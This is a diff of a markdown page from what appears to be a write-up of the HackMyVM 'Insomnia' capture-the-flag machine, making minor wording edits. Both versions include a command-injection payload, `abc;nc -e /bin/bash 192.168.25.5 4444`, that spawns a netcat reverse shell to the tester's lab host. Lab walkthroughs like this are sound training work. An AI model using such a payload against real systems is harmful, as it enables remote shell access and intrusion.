Loco00003/locoweb/content/machines/hackmyvm/Easy machines/Insomnia - hackmyvm/index.md

 ![](imagenes/Pasted%20image%2020240207204758.png)

-We don't know specifically what the php script does, we can suppose it uses `cat <file>` with `system("cmd")` or something like that.
-Now, lets try the following command to see if we can get a reverse shell `abc;nc -e /bin/bash 192.168.25.5 4444`
+We don't know specifically what the php script does, we can suppose it uses `cat <file>` with function `system("cmd")` or something like that.
+Now, lets try the following command to see if we can get a reverse shell: `abc;nc -e /bin/bash 192.168.25.5 4444`

 ## Initial access